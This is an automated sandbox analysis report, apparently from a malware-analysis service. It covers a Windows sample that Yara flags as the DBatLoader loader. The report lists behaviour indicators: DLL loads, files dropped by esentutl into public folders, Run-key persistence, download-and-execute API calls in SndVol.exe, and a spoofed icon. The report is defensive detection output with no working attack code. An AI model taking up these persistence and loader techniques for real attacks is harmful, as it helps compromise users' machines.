              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
              Source: jlPBMMQbXC.exeStatic file information: File size 1243648 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
              Source: Binary string: easinvoker.pdbH source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdbGCTL source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E41E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E44F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: 0.2.jlPBMMQbXC.exe.2c50000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.jlPBMMQbXC.exe.23e65a8.0.unpack, type: UNPACKEDPE
              Source: alpha.pif.6.drStatic PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02C6894C
              Source: alpha.pif.6.drStatic PE information: section name: .didat
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C7D2FC push 02C7D367h; ret 0_2_02C7D35F
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C563AE push 02C5640Bh; ret 0_2_02C56403
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C563B0 push 02C5640Bh; ret 0_2_02C56403
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5C349 push 8B02C5C1h; ret 0_2_02C5C34E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C7C378 push 02C7C56Eh; ret 0_2_02C7C566
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5332C push eax; ret 0_2_02C53368
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C7D0AC push 02C7D125h; ret 0_2_02C7D11D
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6306C push 02C630B9h; ret 0_2_02C630B1
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6306B push 02C630B9h; ret 0_2_02C630B1
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C7D1F8 push 02C7D288h; ret 0_2_02C7D280
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C7D144 push 02C7D1ECh; ret 0_2_02C7D1E4
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6F108 push ecx; mov dword ptr [esp], edx0_2_02C6F10D
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C56784 push 02C567C6h; ret 0_2_02C567BE
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C56782 push 02C567C6h; ret 0_2_02C567BE
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5D5A0 push 02C5D5CCh; ret 0_2_02C5D5C4
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5C56C push ecx; mov dword ptr [esp], edx0_2_02C5C571
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C7C570 push 02C7C56Eh; ret 0_2_02C7C566
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6AADF push 02C6AB18h; ret 0_2_02C6AB10
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C68AD8 push 02C68B10h; ret 0_2_02C68B08
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6AAE0 push 02C6AB18h; ret 0_2_02C6AB10
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02CC4A50 push eax; ret 0_2_02CC4B20
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5CBEC push 02C5CD72h; ret 0_2_02C5CD6A
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6886C push 02C688AEh; ret 0_2_02C688A6
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C5C9DE push 02C5CD72h; ret 0_2_02C5CD6A
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C66946 push 02C669F3h; ret 0_2_02C669EB
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C66948 push 02C669F3h; ret 0_2_02C669EB
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6790C push 02C67989h; ret 0_2_02C67981
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C65E7C push ecx; mov dword ptr [esp], edx0_2_02C65E7E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C62F60 push 02C62FD6h; ret 0_2_02C62FCE
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0447E47A push esi; ret 8_2_0447E483
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_0442169A push eax; ret 8_2_044216F4

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Selebzih.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_29136EEB ShellExecuteW,URLDownloadToFileW,8_2_29136EEB
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Selebzih.PIFJump to dropped file
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
              Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_2914AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_2914AB9E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SelebzihJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SelebzihJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Icon mismatch, binary includes an icon from a different legit application in order to fool users
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon306.png
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeCode function: 0_2_02C6AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_02C6AB1C
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
